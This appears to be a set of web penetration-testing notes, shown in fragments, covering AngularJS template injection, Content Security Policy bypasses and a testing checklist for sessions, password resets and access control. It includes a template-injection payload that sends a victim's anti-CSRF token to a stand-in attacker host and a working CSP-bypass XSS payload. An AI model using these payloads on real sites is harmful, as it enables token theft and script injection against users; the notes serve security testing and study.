Steinz Security

Template Injection & Scope Hacking - Attack is limited to $scope functions and variables - Check if an application is using angular JS & Vulnerable to Template Injection or not. - Check the source code for `angular` keyword - open dev tools --> Console --> `angular.element($0).scope()` - This lists the scope - all the elements in the page - Check the soure code of functions to see what its doing - Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ; - Check for any injectable variables (Ex: some empty or dynamic content ) - Call the function - Send the below payload as input and see the connection going out - which has the victim's anti-csrf token -` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}` - input `{{4-1}}` --> if the output is 3 --> VULNERABLE - use this any input or search parametes. Going Beyond the Scope - XSS via Templat

- CSP can be implemented via - Response header - Meta tag <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> Bypass CSP via ajax.googleapis.com via Flash file via Polyglot file via AngularJS Bypass CSP via ajax.googleapis.com Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com` - here script-src 'self' ajax.googleapis.com means -> it allows only the same domains scripts + ajax.googleapis.com scripts <div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script> Bypass CSP via Flash File Works if the CSP is `Content-Security-Policy: script-src 'self'`; when the only restriction is script- we can bypass it using Flash File <object t

  - Fuzz the Application - Check if the appliation using AngularJS - Check for Content Security Policy - Check if httonly and Secure flags are added in the cookie or not & HSTS - If there is any payment involved --> Try to perform Race conditions - Login as Admin and LowPriv user and check BAC & IDOR using ZAP/Burp - ChecK Session Vulnerabilities - Take the sessionID of the user and logout --> return using the same sessionID - Check Password Reset Link --> req email and go to the link --> see if there are any external urls being used inside the webpage --> check the referer of the domain --> see if the Password reset token is available in the Referrer header. - Check Parameter Pollution --> Add same parameters twice with different varaiable/ID - Look for IDOR & Broken Access Control - Use Burp Authorize or Owasp ZAP (Access Control from Market place) to test - `AutoComplete=off` --> Credit card Processing/Password --> Check if the browse